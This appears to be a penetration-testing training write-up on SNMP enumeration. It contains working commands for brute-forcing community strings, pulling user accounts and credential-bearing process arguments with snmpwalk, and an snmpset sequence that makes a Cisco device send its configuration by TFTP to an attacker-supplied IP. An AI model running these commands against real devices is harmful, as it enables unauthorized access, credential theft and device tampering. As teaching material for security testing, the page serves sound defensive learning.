SNMP Enumeration

intermediate25 minWriteup

Extracting sensitive information via SNMP

Learning Objectives

  • Understand SNMP protocol
  • Enumerate SNMP communities
  • Extract system information
  • Find credentials via SNMP

SNMP (Simple Network Management Protocol) was designed to help administrators monitor and manage network devices. In practice, it's like giving everyone a master key to your building and hoping they'll only use it to check if the lights are on.

Running on UDP port 161, SNMP is found on routers, switches, printers, servers, and IoT devices. The protocol is notoriously insecure - especially SNMP v1 and v2c, which use cleartext "community strings" as passwords. These strings are often left at defaults: "public" for read access and "private" for write access.

SNMP = Security Not My Problem

That's the industry joke, and it's painfully accurate. SNMP can expose usernames, running processes, network configurations, and even credentials. Many admins don't even know SNMP is enabled.

SNMP Basics

SNMP Versions

  • SNMP v1: Original, cleartext, weak security
  • SNMP v2c: Better performance, still cleartext
  • SNMP v3: Encryption and authentication (rare)

Community Strings

Community strings are essentially passwords. SNMPv1/v2c sends them in cleartext:

  • Read-only (RO): Usually "public" - can read all data
  • Read-write (RW): Usually "private" - can modify device

MIB - Management Information Base

MIB is a hierarchical database of values (OIDs) that can be queried. Think of it as a tree where each branch leads to different information:

11.3.6.1.2.1.1.1.0    - System description
21.3.6.1.2.1.1.3.0    - System uptime
31.3.6.1.2.1.1.5.0    - System name
41.3.6.1.4.1.77.1.2.25 - Windows user accounts
51.3.6.1.2.1.25.4.2.1.2 - Running processes
61.3.6.1.2.1.6.13.1.3  - TCP connections

SNMP Discovery

bash
1606070;"># Nmap SNMP detection
2nmap -sU -p 161 192.168.1.0/24
3nmap -sU -p 161 --script snmp-info 192.168.1.10
4 
5606070;"># Check for common community strings
6nmap -sU -p 161 --script snmp-brute 192.168.1.10
7 
8606070;"># Onesixtyone - fast community string scanner
9onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.10
10onesixtyone -c community.txt -i hosts.txt

SNMP Enumeration

SNMPwalk

SNMPwalk queries entire subtrees of the MIB, dumping all accessible information. It's the go-to tool for SNMP enumeration.

bash
1606070;"># Walk entire MIB tree
2snmpwalk -v2c -c public 192.168.1.10
3 
4606070;"># Walk specific OID
5snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.1
6 
7606070;"># Get system info
8snmpwalk -v2c -c public 192.168.1.10 system
9 
10606070;"># Get network interfaces
11snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.2.2
12 
13606070;"># Get installed software (Windows)
14snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.25.6.3.1.2
15 
16606070;"># Get running processes
17snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.25.4.2.1.2
18 
19606070;"># Get open TCP connections
20snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.6.13.1.3

SNMPcheck

bash
1606070;"># Comprehensive SNMP enumeration
2snmp-check 192.168.1.10
3snmp-check -c public 192.168.1.10
4snmp-check -c public -v2c 192.168.1.10

Windows User Enumeration

On Windows systems, OID 1.3.6.1.4.1.77.1.2.25 returns local user accounts. This is gold for password attacks!

Community String Brute Force

bash
1606070;"># Using onesixtyone (fastest)
2onesixtyone -c community-strings.txt -i hosts.txt
3 
4606070;"># Using Hydra
5hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.10 snmp
6 
7606070;"># Using Metasploit
8use auxiliary/scanner/snmp/snmp_login
9set RHOSTS 192.168.1.0/24
10set PASS_FILE /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
11run
12 
13606070;"># Nmap brute
14nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=communities.txt 192.168.1.10

Common Community Strings

Beyond "public" and "private", try: admin, manager, secret, cisco, cable-docsis, and company-specific variations.

Windows SNMP

bash
1606070;"># Enumerate Windows users
2snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.4.1.77.1.2.25
3 
4606070;"># Enumerate Windows shares
5snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.4.1.77.1.2.27
6 
7606070;"># Enumerate running services
8snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.4.1.77.1.2.3.1.1
9 
10606070;"># Enumerate installed software
11snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.25.6.3.1.2
12 
13606070;"># Enumerate storage
14snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.25.2.3.1.3
15 
16606070;"># Enumerate processes with paths
17snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.25.4.2.1.4
18 
19606070;"># Enumerate listening ports
20snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.6.13.1.3

Linux SNMP

bash
1606070;"># Running processes
2snmpwalk -v2c -c public 192.168.1.10 hrSWRunName
3 
4606070;"># Memory usage
5snmpwalk -v2c -c public 192.168.1.10 hrMemorySize
6 
7606070;"># Mount points
8snmpwalk -v2c -c public 192.168.1.10 hrFSMountPoint
9 
10606070;"># Process parameters (might include credentials!)
11snmpwalk -v2c -c public 192.168.1.10 hrSWRunParameters

Credentials in Process Lists

Process command lines can contain credentials passed as arguments! Look for mysql, ssh, rsync commands with passwords.

SNMP Write Access

If you have write access (usually with "private" community string), you can modify device configurations - potentially catastrophic.

bash
1606070;"># Check for write access
2snmpset -v2c -c private 192.168.1.10 1.3.6.1.2.1.1.5.0 s 606070;">#a5d6ff;">"NewSystemName"
3 
4606070;"># If successful, you have write access!
5 
6606070;"># Download device config (Cisco)
7606070;"># This requires write access to create TFTP transfer
8snmpset -v2c -c private 192.168.1.10 1.3.6.1.4.1.9.9.96.1.1.1.1.2.1 i 1
9snmpset -v2c -c private 192.168.1.10 1.3.6.1.4.1.9.9.96.1.1.1.1.3.1 i 4
10snmpset -v2c -c private 192.168.1.10 1.3.6.1.4.1.9.9.96.1.1.1.1.4.1 i 1
11snmpset -v2c -c private 192.168.1.10 1.3.6.1.4.1.9.9.96.1.1.1.1.5.1 a YOUR_IP
12snmpset -v2c -c private 192.168.1.10 1.3.6.1.4.1.9.9.96.1.1.1.1.6.1 s 606070;">#a5d6ff;">"config.txt"

SNMP v3

SNMP v3 adds authentication and encryption. It's more secure but still attackable if credentials are weak.

bash
1606070;"># SNMP v3 enumeration
2snmpwalk -v3 -u admin -l authNoPriv -a MD5 -A password123 192.168.1.10
3 
4606070;"># With encryption
5snmpwalk -v3 -u admin -l authPriv -a SHA -A authpass -x AES -X privpass 192.168.1.10
6 
7606070;"># Brute force v3 credentials
8nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=passwords.txt 192.168.1.10

SNMP Enumeration Methodology

SNMP Enumeration Process

1
DiscoveryScan for UDP 161 across network
2
Community BruteTry common community strings
3
System InfoQuery system description and name
4
User EnumExtract user accounts
5
Process EnumGet running processes and parameters
6
Network InfoEnumerate interfaces and connections
7
Write TestCheck for write access if private found

Knowledge Check

Quick Quiz
Question 1 of 3

What are the default SNMP community strings?

Challenges

SNMP User Hunt

Challenge
🌱 beginner

Find a device running SNMP and enumerate all local user accounts.

Need a hint? (4 available)

Process Credential Leak

Challenge
🔥 intermediate

Find credentials exposed in process command lines via SNMP.

Need a hint? (4 available)

Key Takeaways

  • SNMP runs on UDP port 161 - often forgotten and misconfigured
  • Default community strings are "public" (read) and "private" (write)
  • SNMPv1/v2c send community strings in cleartext
  • SNMP can expose users, processes, shares, and network config
  • Process command lines may contain credentials
  • Write access can allow device reconfiguration
  • onesixtyone is fastest for community string brute forcing